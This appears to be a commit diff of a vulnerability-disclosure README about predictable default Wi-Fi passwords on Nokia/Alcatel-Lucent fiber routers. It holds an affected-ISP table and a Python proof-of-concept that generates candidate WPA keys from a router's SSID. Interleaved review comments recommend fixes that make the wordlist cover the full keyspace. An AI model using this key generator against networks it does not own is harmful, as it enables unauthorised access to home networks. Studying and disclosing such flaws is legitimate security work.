Compare commits
No commits in common. "master" and "master" have entirely different histories.
40
Readme.md
@ -13,7 +13,6 @@ This type of connection requires different equipment than ADSL/VDSL and thus spe
|
|||||||
|
|
||||||
Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufactures of these devices and the suppliers for ISPs. Unsurprisingly, many different devices from even different companies have the same components and sometimes even share some software stack: below is a noncomprehensive table of confirmed and suspected devices having the same common problems described later. Apparently there's also a reseller called Zhone that customizes the same CPE for some ISPs. Eltex might be another one.
|
Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufactures of these devices and the suppliers for ISPs. Unsurprisingly, many different devices from even different companies have the same components and sometimes even share some software stack: below is a noncomprehensive table of confirmed and suspected devices having the same common problems described later. Apparently there's also a reseller called Zhone that customizes the same CPE for some ISPs. Eltex might be another one.
|
||||||
|
|
||||||
_UPDATE:_ Thanks to some contributions some ISPs not in the original XML files have been added and other have been updated.
|
|
||||||
|
|
||||||
| CODE | Country | ISP | Manufacturer | Model | SSID Format |
|
| CODE | Country | ISP | Manufacturer | Model | SSID Format |
|
||||||
|---|---|---|---|---|---|
|
|---|---|---|---|---|---|
|
||||||
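Review bot: the `_UPDATE:_` sentence removed in this hunk is the README's only statement that some ISP rows came from contributions rather than from the original XML files; if any contributed rows stay in the table, keep the sentence so the table's provenance remains clear. While this paragraph is being touched, the context line has "manufactures" where "manufacturers" is meant, and "noncomprehensive" reads better as "non-comprehensive".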
@ -44,11 +43,9 @@ _UPDATE:_ Thanks to some contributions some ISPs not in the original XML files h
|
|||||||
| LATT | Latvia | Lattelekom | Unknown | Unknown | `ALHN-%s` |
|
| LATT | Latvia | Lattelekom | Unknown | Unknown | `ALHN-%s` |
|
||||||
| JPNX | Japan | Unknown | Unknown | Unknown | `ALHN-%s` |
|
| JPNX | Japan | Unknown | Unknown | Unknown | `ALHN-%s` |
|
||||||
| LAOS | Laos | Sky Telecom | Unknown | Unknown | `SKYTEL-%4s` |
|
| LAOS | Laos | Sky Telecom | Unknown | Unknown | `SKYTEL-%4s` |
|
||||||
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet-%4s` |
|
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet` |
|
||||||
| PXSF | Belgium | Belgacom | Unknown | Unknown | Unspecified |
|
| PXSF | Belgium | Belgacom | Unknown | Unknown | Unspecified |
|
||||||
| OCIT | Ivory Coast | Orange Ivory Coast | Nokia | G-240W-A | `ORANGEFIBER-%4s` |
|
| OCIT | Ivory Coast | Orange Ivory Coast | Nokia | G-240W-A | `ORANGEFIBER-%4s` |
|
||||||
| Unknown | Caraibes | Canalbox Caraibes | Unknown | Unknown | `CANALBOX-%4s` |
|
|
||||||
| Unknown | Poland | Inea | Unknown | Unknown | `INEA-%4s` |
|
|
||||||
|
|
||||||
## FCC Infos
|
## FCC Infos
|
||||||
Different enclosures or slight variants of the same board can be identified by looking at the [documents published by Nokia for the FCC](https://fccid.io/2ADZR).
|
Different enclosures or slight variants of the same board can be identified by looking at the [documents published by Nokia for the FCC](https://fccid.io/2ADZR).
|
||||||
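Review bot: the VIVA row changes the SSID format from `VIVACOM_FiberNet-%4s` to `VIVACOM_FiberNet`, dropping the only placeholder in that pattern while the neighbouring rows (`SKYTEL-%4s`, `ORANGEFIBER-%4s`) keep theirs; confirm the form against an observed default SSID and state in the commit message which one is correct. The same hunk deletes the `CANALBOX-%4s` and `INEA-%4s` rows without explanation; if they turned out to be wrong, say so, otherwise keep them so owners of those devices can still recognise an affected default SSID.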
@ -496,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
|
|||||||
import argparse, base64, hashlib, re
|
import argparse, base64, hashlib, re
|
||||||
|
|
||||||
def genpwd_longpasswd(oui, serialnum):
|
def genpwd_longpasswd(oui, serialnum):
|
||||||
def str2md5(string):
|
def str2md5(string):
|
||||||
m = hashlib.md5()
|
m = hashlib.md5()
|
||||||
m.update(string.encode("ascii"))
|
m.update(string.encode("ascii"))
|
||||||
return m.digest()
|
return m.digest()
|
||||||
|
|
||||||
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
||||||
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
||||||
|
|
||||||
#md5_secret1 = str2md5(secret1)
|
#md5_secret1 = str2md5(secret1)
|
||||||
md5_secret2 = str2md5(secret2)
|
md5_secret2 = str2md5(secret2)
|
||||||
|
|
||||||
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
||||||
|
|
||||||
lower = upper = 0
|
lower = upper = 0
|
||||||
|
|
||||||
for i in range(8):
|
for i in range(8):
|
||||||
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
||||||
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
||||||
|
|
||||||
longpasswd = ((upper<<32)+lower)%0x2540be400
|
longpasswd = ((upper<<32)+lower)%0x2540be400
|
||||||
|
|
||||||
return longpasswd
|
return longpasswd
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
|
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
|
||||||
parser.add_argument("ssid", type=str, help="the ssid to attack")
|
parser.add_argument("ssid", type=str, help="the ssid to attack")
|
||||||
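Review bot: the old and new sides of this hunk read identically as rendered, so whatever it changes is presumably whitespace or line endings; put that in a separate commit so it does not bury the functional edits in the next hunk. In `genpwd_longpasswd` the three commented-out lines (`#secret1`, `#md5_secret1`, `#wanpasswd`) are dead code and should be removed or explained in a comment, and the function needs a docstring saying that it returns an integer reduced modulo `0x2540be400` (10^10), since the caller is responsible for formatting it to a fixed width of ten digits.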
@ -554,9 +551,8 @@ for s in ssids:
|
|||||||
serialBytes = args.ssid
|
serialBytes = args.ssid
|
||||||
for r in s.split("[A-F0-9]{4}"):
|
for r in s.split("[A-F0-9]{4}"):
|
||||||
serialBytes = serialBytes.replace(r, "")
|
serialBytes = serialBytes.replace(r, "")
|
||||||
for i in range(0xffff + 1):
|
for i in range(0xffff):
|
||||||
candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
|
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
|
||||||
print(f"{candidate:010}")
|
|
||||||
break
|
break
|
||||||
```
|
```
|
||||||
|
|
||||||
|
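Review bot: the loop bound changes from `range(0xffff + 1)` to `range(0xffff)`, which stops at 0xfffe and never evaluates the prefix `ffff`, so the loop no longer covers the full 16-bit range that the `{:04x}` format implies. The new `print(genpwd_longpasswd(...))` also drops the `f"{candidate:010}"` formatting, so any value below 10^9 is printed with fewer than ten digits and its leading zeros are lost; keep the `+ 1` and the zero-padded print from the old side.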